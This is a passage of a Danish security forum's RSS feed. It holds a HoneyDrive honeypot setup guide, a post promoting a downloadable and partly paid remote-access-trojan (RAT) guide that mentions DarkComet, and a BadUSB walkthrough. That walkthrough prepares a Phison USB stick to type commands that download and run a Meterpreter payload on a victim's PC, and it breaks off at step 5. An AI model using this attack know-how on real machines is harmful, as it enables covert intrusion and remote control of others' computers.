Når HoneyDrive er bootet, så vil jeg anbefale at lave en "netstat -antp" og en "netstat -anup", så man kan kontrollere, der ikke kører services der ikke skal kunne tilgås fra Internettet. Nogle services vil altid køre og det er ok, så længe de kun lytter på localhost/127.0.0.1.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Mere:</span><br />
Ud over det vi har været i gennem, indeholder HoneyDrive følgende:<br />
Honeyd, Amun, Glastopf, Conpot, Wordpot. Thug, PhoneyC, LaBrea, Tiny Honepot, IIS Emulator, INet Sim, Maltrive, en masse interfaces til at se statistik med, og en del andre tools.<br />
Jeg har dog kun erfaring med Kippo Og Dionaea og kører altid disse to samtidig.<br />
Den readme file der er under download linket, sammen med HoneyDrive, er et must-read.<br />
Lige når man har bootet HoneyDrive, vil der være en hel del opdateringer. Om man vil opdatere det hele eller ej, er valgfrit, man skal dog være opmærksom på, at opdateringer muligvis gør, at noget ikke fungerer.<br />
Er man interesseret i det, findes der en masse på nettet om disse ting. Det er et stort område, og denne guide er meget kort. Det er min intention at få folk i gang, og at i får lidt blod på tanden. Og så selv finde nogle flere informationer om de enkelte elementer.<br />
<br />
Det kan anbefales at lave nogle små scripts, der viser interessante mapper, starter eller stopper den eller de honeypots, man ønsker at køre. Det har jeg gjort.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Links:</span><br />
<a href="http://bruteforce.gr/honeydrive" target="_blank" rel="noopener" class="mycode_url">Bruteforce.gr/honeydrive</a><br />
<a href="http://sourceforge.net/projects/honeydrive/files/HoneyDrive%203%20Royal%20Jelly%20edition/" target="_blank" rel="noopener" class="mycode_url">Sourceforge Download</a><br />
<a href="https://www.virtualbox.org/wiki/Downloads" target="_blank" rel="noopener" class="mycode_url">VirtualBox Download</a><br />
<a href="https://github.com/desaster/kippo" target="_blank" rel="noopener" class="mycode_url">Kippo</a><br />
<a href="http://dionaea.carnivore.it/" target="_blank" rel="noopener" class="mycode_url">Dionaea</a>]]></description>
			<content:encoded><![CDATA[<span style="font-weight: bold;" class="mycode_b">Indledning:</span><br />
Der er blevet ønsket nogle informationer om honeypots, så her er en lille guide til at hjælpe dem i gang, der gerne vil have et indblik i, hvordan det virker.<br />
Jeg har med vilje valgt en færdigbygget distro, for at slippe for at skulle beskrive installation og opsætning af denne. <br />
<br />
Produktet vi vil se lidt på, er HoneyDrive version 3 fra Bruteforce.gr. Bemærk at den første version hed 0.1 og den næste version hed 0.2, men da både brugerne og ophavsmanden synes det var lidt underligt, sprang man der efter direkte til version 3. Det er en VM og er bygget til Oracle VirtualBox.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Om Honeydrive:</span><br />
HoneyDrive er en samlig af honeypots, så man skal vælge hvad man vil køre. Der er et overlap i de porte de forskellige honeypots lytter på, alt efter hvilke services de virker med. Og der er forskellige typer honeypots. Her til, er der nogle scripts og nogle web interfaces til at se statistikker osv med. HoneyDrive er baseret på Ubuntu. Brugeren og koden til Honeydrive er honeydrive:honeydrive, dog bliver man automatisk logget på, når den booter. Denne bruger er en sudo bruger.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Kippo:</span><br />
Kippo er en medium-interaction SSH honeypot. Dette betyder, at en bruger/hacker der f.eks. har held med at brugeforce koden, faktisk kan indtaste kommandoer og få nogen lunde realistisk output tilbage. Outputtet er statisk, så det er ret nemt at se, det er en honeypot, hvis man bare er opmærksom på det. Man kan godt ændre disse statiske ting, og ændre i filsystemet, som f.eks. lave nye mapper, og definere nye kommandoer, ændre i nuværende osv., men det er ikke just en dans på roser.<br />
Når man bruger Kippo, vil hele brugerens session blive gemt, og man kan så afspille denne log, for at se alt hvad brugeren gør. Man kan få et indblik i, hvordan hackerne arbejder. De filedownloads brugeren udfører, vil blive gemt, så du kan se på dem efterfølgende.<br />
Selv om brugeren forsøger at eksekvere de filer, der bliver downloaded, sker der ikke noget, så man skal ikke være bange for at blive inficeret med noget.<br />
<br />
Kippo startes med følgende kommando:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>&#36; sh /honeydrive/kippo/start.sh</blockquote>
Og stoppes med:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>&#36; sh /honeydrive/kippo/stop.sh</blockquote>
<br />
Så vidt jeg husker, vil Kippo ikke køre som root.<br />
Når først Kippo er kørende, er det bare at vente på, nogen bider på krogen.<br />
Det sjove er selvfølgelig at se de data der bliver samlet.<br />
Man skal selvfølgelig huske at hive HoneyDrive af nettet, da det kræver man startet Apache2 og det gøres med:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>&#36; service apache2 start</blockquote>
<br />
Start en browser og besøg "http://127.0.0.1/kippo-graph/".<br />
<br />
Jeg har sat nogle screenshots ind, men det giver selvfølgelig et bedre billede, hvis man selv kan kigge. Jeg viser heller ikke det hele, så se det som en appetitvækker.<br />
<br />
<!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.shellsec.pw/images/attachtypes/image.gif" title="PNG Image" border="0" alt=".png" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="attachment.php?aid=86" target="_blank" title="">ki_gra_7.PNG</a> (Størrelse: 102,93 KB / Downloads: 42)
<!-- end: postbit_attachments_attachment --><br />
<br />
<!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.shellsec.pw/images/attachtypes/image.gif" title="PNG Image" border="0" alt=".png" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="attachment.php?aid=87" target="_blank" title="">ki_gra_3.PNG</a> (Størrelse: 37,76 KB / Downloads: 25)
<!-- end: postbit_attachments_attachment --><br />
<br />
Kippo gemmer downloaded filer i "/honeydrive/kippo/dl/" og de aktivitetslogs der bliver dannet, når en logger ind på Kippo "ssh server", ligger i "/honeydrive/kippo/log/tty/".<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Dionaea:</span><br />
En anden form for honeypot er Dionaea og denne virker helt anderledes. Det er ikke meningen, den skal have nogen interaktion med brugeren. <br />
Den er bygget til at samle malware med. Oftest noget der kommer fra bots, der "surfer" nettet efter ofre, den kan angribe automatisk.<br />
Derfor lytter den efter bestemte services, og når der kommer en request, svarer den så godt den kan, med det for øje, at få maskinen "inficeret". Maskinen bliver selvfølgelig ikke inficeret, men Dionaea downloader malwaren, så den kan researches. Det er selvfølgelig mest interessant, hvis man gerne vil reverse malwaren og undersøge malware trends. Og selvfølgelig evt. samle 0-days op til analyse.<br />
<br />
Dionaea startes med:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>&#36; sh /honeydrive/dionaea-vagrant/runDionaea.sh</blockquote>
<br />
For a se statistikker fra Dionaea, bruger jeg DionaeaFR og dette startes med:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>/honeydrive/DionaeaFR&#36; python manage.py runserver</blockquote>
<br />
Start så en browser og besøg "https://127.0.0.1:8000/".<br />
<br />
Jeg kan ikke huske om DionaeaFR kun lytter på localhost, men det er selvfølgelig en god idé at sørge for, den ikke kan nås fra Internettet, når man kigger på disse data.<br />
<br />
<!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.shellsec.pw/images/attachtypes/image.gif" title="PNG Image" border="0" alt=".png" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="attachment.php?aid=89" target="_blank" title="">dio_binary.PNG</a> (Størrelse: 83,42 KB / Downloads: 24)
<!-- end: postbit_attachments_attachment --><br />
<br />
<!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.shellsec.pw/images/attachtypes/image.gif" title="PNG Image" border="0" alt=".png" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="attachment.php?aid=88" target="_blank" title="">dio_fr_5.PNG</a> (Størrelse: 39,47 KB / Downloads: 16)
<!-- end: postbit_attachments_attachment --><br />
<br />
Dionaea gemmer malware, den har hentet/modtaget i "/opt/dionaea/var/dionaea/binaries/", så det kan være en god idé at holde lidt øje her.<br />
<br />
Netstat med Kippo og Dionaea kørende:<br />
<br />
<!-- start: postbit_attachments_attachment -->
<br /><!-- start: attachment_icon -->
<img src="https://www.shellsec.pw/images/attachtypes/image.gif" title="PNG Image" border="0" alt=".png" />
<!-- end: attachment_icon -->&nbsp;&nbsp;<a href="attachment.php?aid=85" target="_blank" title="">honey_netstat.PNG</a> (Størrelse: 135,48 KB / Downloads: 22)
<!-- end: postbit_attachments_attachment --><br />
<br />
Som man kan se, kan der være ret meget traffik.<br />
Jeg har faktisk også været ude for, at et helt klasse C netværk kørte SSH bruteforce eller dictionary attack mod min honeypot. Det må man sige at være organiseret kriminalitet.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">OBS:</span><br />
For at få noget traffik på en honeypot, skal den selvfølgelig kunne tilgås fra Internettet. Enten direkte på nettet, eller via NAT eller lign.<br />
Vær opmærksom på at Apache automatisk starter på HoneyDrive, så vis man booter HoneyDrive, og maskinen er direkte på nettet, vil alle i verden kunne se Kippos statistikker. Og det må siges at være et lidt for tydeligt hint for en hacker, om at det er en honeypot. Et andet problem med dette er, at hvis man bruger en anden honeypot som lytter på port 80, vil porten allerede være i brug af Apache. Det anbefales at slå dette fra.<br />
En lille fodnote: Hvis du sætter den direkte på Nettet og host operativsystemet er windows, skal du sikre dig, din windows maskine ikke får en offentlig IP, og ikke kan tilgås fra Internettet. Desværre kan man ikke bare deaktivere hostens netkort, så vil guest operativsystemet (HoneyDrive) heller ikke være tilgængelig. Et trick kan være at lade netkortet på hosten (windows) være aktivt, men slå IPv4 og IPv6 fra.<br />
Disse udfordringer har man ikke med Linux som host operativsystem.<br />
Når HoneyDrive er bootet, så vil jeg anbefale at lave en "netstat -antp" og en "netstat -anup", så man kan kontrollere, der ikke kører services der ikke skal kunne tilgås fra Internettet. Nogle services vil altid køre og det er ok, så længe de kun lytter på localhost/127.0.0.1.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Mere:</span><br />
Ud over det vi har været i gennem, indeholder HoneyDrive følgende:<br />
Honeyd, Amun, Glastopf, Conpot, Wordpot. Thug, PhoneyC, LaBrea, Tiny Honepot, IIS Emulator, INet Sim, Maltrive, en masse interfaces til at se statistik med, og en del andre tools.<br />
Jeg har dog kun erfaring med Kippo Og Dionaea og kører altid disse to samtidig.<br />
Den readme file der er under download linket, sammen med HoneyDrive, er et must-read.<br />
Lige når man har bootet HoneyDrive, vil der være en hel del opdateringer. Om man vil opdatere det hele eller ej, er valgfrit, man skal dog være opmærksom på, at opdateringer muligvis gør, at noget ikke fungerer.<br />
Er man interesseret i det, findes der en masse på nettet om disse ting. Det er et stort område, og denne guide er meget kort. Det er min intention at få folk i gang, og at i får lidt blod på tanden. Og så selv finde nogle flere informationer om de enkelte elementer.<br />
<br />
Det kan anbefales at lave nogle små scripts, der viser interessante mapper, starter eller stopper den eller de honeypots, man ønsker at køre. Det har jeg gjort.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Links:</span><br />
<a href="http://bruteforce.gr/honeydrive" target="_blank" rel="noopener" class="mycode_url">Bruteforce.gr/honeydrive</a><br />
<a href="http://sourceforge.net/projects/honeydrive/files/HoneyDrive%203%20Royal%20Jelly%20edition/" target="_blank" rel="noopener" class="mycode_url">Sourceforge Download</a><br />
<a href="https://www.virtualbox.org/wiki/Downloads" target="_blank" rel="noopener" class="mycode_url">VirtualBox Download</a><br />
<a href="https://github.com/desaster/kippo" target="_blank" rel="noopener" class="mycode_url">Kippo</a><br />
<a href="http://dionaea.carnivore.it/" target="_blank" rel="noopener" class="mycode_url">Dionaea</a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[RAT Guide]]></title>
			<link>https://www.shellsec.pw/traad-rat-guide</link>
			<pubDate>Thu, 09 Apr 2015 14:04:02 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-rat-guide</guid>
			<description><![CDATA[<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/rE9pqpn.png" alt="[Billede: rE9pqpn.png]" class="mycode_img" /><br />
<br />
<br />
Hvis du er nyt til diverse RAT programmer, så er det et godt sted at starte her.<br />
Jeg har skrevet en guide som er til at forstå for alle forhåbenligt.<br />
Kom gerne med ris og ros hvad der kan gøres bedre eller skal rettes.<br />
Jeg vil opdater guiden med fejl eller mangler hvis det er nødvendigt.<br />
<br />
LÆS GUIDEN FØR DU SPØRG OM HJÆLP TAK!<br />
Det er meget begrænset hvad jeg hjælper med i guiden.<br />
Premium versionen er på vej hvor der er fuld support + mere. Det hele står i guiden.<br />
Premium kommer til at koste Koster 25kr.<br />
<br />
<br />
<a href="http://www.mediafire.com/download/yl2155zztr2zk6b/Rat+Guide+Free+Edition.pdf" target="_blank" rel="noopener" class="mycode_url"><span style="color: #1E90FF;" class="mycode_color">Guiden kan hentes her</span></a><br />
<br />
Password er: <span style="color: #FF0000;" class="mycode_color">shellsec.pw</span></div>
<br />
Virustotal link fra DarkNigga: <a href="https://www.virustotal.com/da/file/c9d61...428590782/" target="_blank" rel="noopener" class="mycode_url">https://www.virustotal.com/da/file/c9d61...428590782/</a><br />
DarkComet er ikke mit eget link, der er fra en meget trusted gut fra HF.]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/rE9pqpn.png" alt="[Billede: rE9pqpn.png]" class="mycode_img" /><br />
<br />
<br />
Hvis du er nyt til diverse RAT programmer, så er det et godt sted at starte her.<br />
Jeg har skrevet en guide som er til at forstå for alle forhåbenligt.<br />
Kom gerne med ris og ros hvad der kan gøres bedre eller skal rettes.<br />
Jeg vil opdater guiden med fejl eller mangler hvis det er nødvendigt.<br />
<br />
LÆS GUIDEN FØR DU SPØRG OM HJÆLP TAK!<br />
Det er meget begrænset hvad jeg hjælper med i guiden.<br />
Premium versionen er på vej hvor der er fuld support + mere. Det hele står i guiden.<br />
Premium kommer til at koste Koster 25kr.<br />
<br />
<br />
<a href="http://www.mediafire.com/download/yl2155zztr2zk6b/Rat+Guide+Free+Edition.pdf" target="_blank" rel="noopener" class="mycode_url"><span style="color: #1E90FF;" class="mycode_color">Guiden kan hentes her</span></a><br />
<br />
Password er: <span style="color: #FF0000;" class="mycode_color">shellsec.pw</span></div>
<br />
Virustotal link fra DarkNigga: <a href="https://www.virustotal.com/da/file/c9d61...428590782/" target="_blank" rel="noopener" class="mycode_url">https://www.virustotal.com/da/file/c9d61...428590782/</a><br />
DarkComet er ikke mit eget link, der er fra en meget trusted gut fra HF.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[BadUSB Gennemgang]]></title>
			<link>https://www.shellsec.pw/traad-badusb-gennemgang</link>
			<pubDate>Wed, 22 Oct 2014 23:10:10 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-badusb-gennemgang</guid>
			<description><![CDATA[Synes lige vi skulle tage et kig på BadUSB, så længe det stadig er rimelig nyt for de fleste, og ikke en angrebsmåde man kender til i den brede offentlighed Uden for IT-verdenen. De fleste ville selvfølgelig være lidt suspekte over en fremmed, ja selv en velkendt person, som stikker et USB stik i ens Computer. Det gode er her, at angrebet kan klares ’håndfrit’, og alt der kræves er et minut – man behøver ikke engang kigge på skærmen.<br />
Vi vil kun kigge på ét af de 3 firmware modificeringer som Psychson er stand til at køre på nuværende tidspunkt.<br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="color: #1E90FF;" class="mycode_color">Lad os starte ud med en kort video (1 minut) af mit resultat af denne test:<br />
<iframe width="560" height="315" src="https://www.youtube.com/embed/2AAd3e-p3w0" frameborder="0" allowfullscreen></iframe><br />
- Vær opmærksom på, at min Meterpreter Payload ikke fylder meget, samt er hostet lokalt, så større eksterne filer kan tage længere tid om at blive downloadet ned på offerets PC.<br />
- Du kan også vælge at gemme Powershell vinduet, men for bedre at demonstrere angrebet har jeg valgt ikke at gøre dette.<br />
- Valgte at køre sidste Shell kommando for at vise, at vores Payload kører og er funktionel selv efter enheden er frokoblet (Giver sig selv)</span></span><br />
<br />
<span style="color: #FF4500;" class="mycode_color"><span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size">&lt;Hov Da&gt;<br />
- Har skrevet dette uden retstavning på en Linux maskine, så der er nok rigeligt med fejl at rette. Ting som store I'er og tastefejl.<br />
- Det ser forfærdeligt rodet ud, så må lige få bikset en video sammen.<br />
- Ville også gerne have haft billeder med af diverse kommandoers Output, men der er begrænsning på antal billeder pr. post, så det bliver lige kopieret output i stdet - på et tidspunkt.<br />
- Undskylder på forhånd musikken i baggrunden. Ville have haft klippet alt lyden fra.<br />
- Skriver også lidt langsomt efter der er forbindelse, men sad med en bærbar mere i skødet jeg ikke ville tabe, og mobilen i højre. Så der er lige et par sekunder der kunne have været undværet.<br />
- Kvaliteten er heller ikke for god på en ældre HTC model så sent om aftenen, men har et bedre kamera til rådighed.<br />
- Hov. Der var vidst også begrænsning af indlejrede vidoer.<br />
&lt;/Hov Da&gt;</span></span></span><br />
<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Hvad er BadUSB</span> - En beskrivelse af BadUSB<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #32CD32;" class="mycode_color">Krav</span></span> - Krav til at få denne type angreb til at virke<br />
<span style="font-weight: bold;" class="mycode_b">Trin #1</span> - Installation af SDCC<br />
<span style="font-weight: bold;" class="mycode_b">Trin #2</span> - Server til hosting af Meterpreter Payload<br />
<span style="font-weight: bold;" class="mycode_b">Trin #3</span> - Kompilering af værtøjer<br />
<span style="font-weight: bold;" class="mycode_b">Trin #4</span> - Test af chip og firmware version<br />
<span style="font-weight: bold;" class="mycode_b">Trin #5</span> - Anskaffelse af Burner Image<br />
<span style="font-weight: bold;" class="mycode_b">Trin #6</span> - Backup af enhedens gamle firmware<br />
<span style="font-weight: bold;" class="mycode_b">Trin #7</span> - Compilering af den specialbyggede firmware<br />
<span style="font-weight: bold;" class="mycode_b">Trin #8</span> - Encoding af Rubber Ducky Payload<br />
<span style="font-weight: bold;" class="mycode_b">Trin #9</span> - Flashing og installering af ny firmware<br />
<span style="font-weight: bold;" class="mycode_b">Trin #10</span> - Opsætning af Meterpreter Payload<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #FF6347;" class="mycode_color">Hardware introduceret Boot Mode</span></span> - Der kan opstå problemer med at flashe nyt firmware efter første fimware er installeret. Det kan ordnes ved at kortslutte stifterne på NAND-chippen <br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #FF0000;" class="mycode_color">Advarsel</span></span> - Enheden vil ikke fungere som traditionelt USB-stik mere<br />
<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Hvad er BadUSB?</span></span><br />
BadUSB er en fælles betegnelse for USB enheder, der er modificerede til at afvige fra deres normale egenskaber, og herved opføre sig som andre typer enheder, for eksempel netværkskort – eller i dette tilfælde et HID (Human Interface Device) Keyboard. Dette opnåes ved brug af skræddersyet firmware. <br />
<br />
Her er den originale Talk af <span style="font-weight: bold;" class="mycode_b">Karsten Nohl og Jakob Lel</span>l - fra <span style="font-weight: bold;" class="mycode_b">Black Hat 2014</span><br />
<blockquote class="mycode_quote"><cite>Citer:</cite><a href="https://www.youtube.com/watch?v=nuruzFqMgIw" target="_blank" rel="noopener" class="mycode_url">https://www.youtube.com/watch?v=nuruzFqMgIw</a></blockquote>
<br />
<span style="text-decoration: underline;" class="mycode_u">Desværre har disse herre valgt at holde deres modificerede firmware tæt på kroppen, og de har i skrivende stund endnu ikke offentliggjort denne.</span><br />
<br />
Her har vi så en Talk fra<span style="font-weight: bold;" class="mycode_b"> DerbyCon 4,</span> hvor <span style="font-weight: bold;" class="mycode_b">Adam Caudill og Brandon Willson</span> gennemgår <span style="text-decoration: underline;" class="mycode_u">Deres projekt omhandlende BadUSB</span>:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite><a href="https://www.youtube.com/watch?v=xcsxeJz3blI" target="_blank" rel="noopener" class="mycode_url">https://www.youtube.com/watch?v=xcsxeJz3blI</a></blockquote>
<span style="font-weight: bold;" class="mycode_b">Denne gang blev deres firmware delt offentligt på deres Github, til stor glæde for os andre ;)</span><br />
<blockquote class="mycode_quote"><cite>Citer:</cite><a href="https://github.com/adamcaudill/Psychson/" target="_blank" rel="noopener" class="mycode_url">https://github.com/adamcaudill/Psychson/</a></blockquote>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="color: #32CD32;" class="mycode_color"><span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Krav</span></span><br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #FFFFE0;" class="mycode_color">Windows Maskine</span></span> – Til at køre deres firmware værktøjer.<br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #FFFFE0;" class="mycode_color">Visual Studio/C++</span></span> - Til at kompilere disse med (Har kompileret og uploadet disse filer til: <blockquote class="mycode_quote"><cite>Citer:</cite><a href="http://s000.tinyupload.com/index.php?file_id=02302254012118188682" target="_blank" rel="noopener" class="mycode_url">http://s000.tinyupload.com/index.php?fil...2118188682</a></blockquote>
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #FFFFE0;" class="mycode_color">Small Device C Compiler</span></span> - <blockquote class="mycode_quote"><cite>Citer:</cite><a href="http://sdcc.sourceforge.net/" target="_blank" rel="noopener" class="mycode_url">http://sdcc.sourceforge.net/</a> </blockquote>
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #FFFFE0;" class="mycode_color">Psychson Firmware + Værktøjer</span></span>: <blockquote class="mycode_quote"><cite>Citer:</cite><a href="https://github.com/adamcaudill/Psychson/" target="_blank" rel="noopener" class="mycode_url">https://github.com/adamcaudill/Psychson/</a></blockquote>
 - Git-clone eller download de samlede filer som et .zip arkiv<br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #FFFFE0;" class="mycode_color">Et Burner Image</span></span>: <blockquote class="mycode_quote"><cite>Citer:</cite><a href="http://www.usbdev.ru/files/phison/" target="_blank" rel="noopener" class="mycode_url">http://www.usbdev.ru/files/phison/</a> </blockquote>
- Dette er et krav for at gemme samt installere firmware. <br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #FFFFE0;" class="mycode_color">Et USB stik med Phison <span style="text-decoration: underline;" class="mycode_u">2251-03 (2303)</span> Chipset</span></span> – Dette er indtil videre den eneste understøttede chip.<br />
Her har jeg valgt at benytte en <span style="text-decoration: underline;" class="mycode_u">SanDisk Ultra 16Gb USB 3.0</span> fra følgende shop: <blockquote class="mycode_quote"><cite>Citer:</cite><a href="http://www.bj-trading.dk/bjshop/default.asp?side=info.asp&amp;vare=939986&amp;f=pricr&amp;psn=68,64" target="_blank" rel="noopener" class="mycode_url">http://www.bj-trading.dk/bjshop/default....&amp;psn=68,64</a></blockquote>
<br />
(<span style="font-style: italic;" class="mycode_i"><span style="color: #FFFFE0;" class="mycode_color">Understøttede enheder kan ses her</span></span>: <br />
<blockquote class="mycode_quote"><cite>Citer:</cite><a href="https://github.com/adamcaudill/Psychson/wiki/Known-Supported-Devices" target="_blank" rel="noopener" class="mycode_url">https://github.com/adamcaudill/Psychson/...ed-Devices</a></blockquote>
-<span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">Vær dog opmærksom på, at der af en eller anden grund kan være forskellige chipsets i disse enheder, så bestil et par stykker</span></span>)<br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #FFFFE0;" class="mycode_color">En Rubber Ducky Payload</span></span> – Dette er selve tastetrykkene, som firmwaren udfører når enheden er registreret<br />
(<span style="font-style: italic;" class="mycode_i">Diverse Payloads kan findes i deres Wiki</span>:<br />
 <blockquote class="mycode_quote"><cite>Citer:</cite><a href="https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads" target="_blank" rel="noopener" class="mycode_url">https://github.com/hak5darren/USB-Rubber...i/Payloads</a></blockquote>
 -<br />
 <span style="font-style: italic;" class="mycode_i">Eller ved et kig på Hak5s forum</span>:<br />
 <blockquote class="mycode_quote"><cite>Citer:</cite><a href="https://forums.hak5.org/index.php?/forum/56-usb-rubber-ducky/" target="_blank" rel="noopener" class="mycode_url">https://forums.hak5.org/index.php?/forum...ber-ducky/</a></blockquote>
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #FFFFE0;" class="mycode_color">En RAT Payload</span></span> – Dette kan være en hvilket som helst RAT eller eksekverbar fil til tests. I mit tilfælde vil jeg som altid bruge <span style="text-decoration: underline;" class="mycode_u">Meterpreter</span> <br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #FFFFE0;" class="mycode_color">En webserver</span></span> – Da vi bruger <span style="font-weight: bold;" class="mycode_b">Wget</span> i dette eksempel, skal vi også bruge en server til at hoste vores Meterpreter Payload. </span><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin #1</span></span><br />
<span style="font-weight: bold;" class="mycode_b">Installér Small Device C Compiler (SDCC)</span> til følgende mappe: <span style="text-decoration: underline;" class="mycode_u">C:\Program Files\SDCC</span><br />
I<span style="font-weight: bold;" class="mycode_b"> mit tilfælde</span> installerer jeg til <span style="font-weight: bold;" class="mycode_b">drev C</span>, men dette kan selvfølgelig forekomme anderledes hos andre installationer. <span style="text-decoration: underline;" class="mycode_u">Det er her en god ide at installere SDCC til samme drev/partition som indeholder jeres Windows installation.</span><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin #2</span></span><br />
Da jeg har valgt at køre en <span style="font-weight: bold;" class="mycode_b">Payload der benytter Wget</span>, skal jeg også have en <span style="font-weight: bold;" class="mycode_b">server</span> kørende, for at hoste vores <span style="font-weight: bold;" class="mycode_b">Meterpreter Payload</span>. Dette kan være en <span style="font-weight: bold;" class="mycode_b">webhost, VPS, fildelingstjenester</span> osv. Selv vil jeg til dette eksempel bruge en<span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u"> simpel lokal XAMPP opsætning</span></span>, men <span style="font-weight: bold;" class="mycode_b">Apache</span> kan ligeledes bruges. <span style="font-style: italic;" class="mycode_i">XAMPP er installér-og-kør, så der er ingen grund til at gå i dybden med det. </span><br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="color: #4682B4;" class="mycode_color">Hvis du vælger at benytte dig af mine for-kompilerede filer, så kan du springe Trin #1 over</span></span>.<br />
</span><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin #3</span></span><br />
Kompiler <span style="font-weight: bold;" class="mycode_b">DriveCom, EmbedPayload og Injector</span> ved at <span style="text-decoration: underline;" class="mycode_u">åbne deres tilhørende .sln filer en ad gangen i Visual Studio/C++ 2012 eller 2013</span>. <span style="font-weight: bold;" class="mycode_b">Tryk</span> herefter på den <span style="text-decoration: underline;" class="mycode_u">øverste menulinie</span> hvor der står <span style="font-weight: bold;" class="mycode_b">’build’</span> og <span style="font-weight: bold;" class="mycode_b">tryk</span> <span style="font-weight: bold;" class="mycode_b">’Build solution’</span>. <span style="text-decoration: underline;" class="mycode_u">Dette kompilerer værktøjerne til <span style="font-weight: bold;" class="mycode_b">Tools</span> undermappen under <span style="font-weight: bold;" class="mycode_b">Psychson</span> hovedmappen.</span><br />
<br />
<img src="http://anony.ws/i/2014/10/22/build.png" alt="[Billede: build.png]" class="mycode_img" />  <br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin #4</span></span><br />
Nu kan vi bruge værktøjet <span style="font-weight: bold;" class="mycode_b">DriveCom</span> <span style="text-decoration: underline;" class="mycode_u">til at sikre os, at vi også har det rigtige hardware i vores USB stik</span>.<br />
<span style="font-weight: bold;" class="mycode_b">Åbn kommandovinduet/CMD</span> i <span style="font-weight: bold;" class="mycode_b">Tools</span> undermappen under <span style="text-decoration: underline;" class="mycode_u">Psychson</span> hovedmappen.<br />
Herfra kan vi bruge <span style="font-weight: bold;" class="mycode_b">følgende kommando</span>, til at få <span style="text-decoration: underline;" class="mycode_u">informationerne fra vores USB enhed</span>:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>DriveCom.exe /drive=G /action=GetInfo</blockquote>
<span style="font-weight: bold;" class="mycode_b">drive</span> skal pege på<span style="text-decoration: underline;" class="mycode_u"> bogstavet der repræsenterer vores USB enhed</span>, <span style="font-style: italic;" class="mycode_i">I mit tilfælde er enheden monteret på <span style="font-weight: bold;" class="mycode_b">G</span></span>.<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">Vil benytte mig af G for resten af denne tekst, så vær opmærksom på dette hvis jeres drev har et anderledes mærkat.</span></span><br />
 <br />
<blockquote class="mycode_quote"><cite>Citer:</cite>C:\Users\Balder\Desktop\Psychson-master\tools&gt;DriveCom.exe /drive=G /action=GetInfo<br />
Action specified: GetInfo<br />
Gathering information...<br />
Reported chip type: 2303<br />
Reported chip ID: D0-51-24-1B-00-00<br />
Reported firmware version: 254.07.00<br />
Mode: Unknown</blockquote>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin #5</span></span><br />
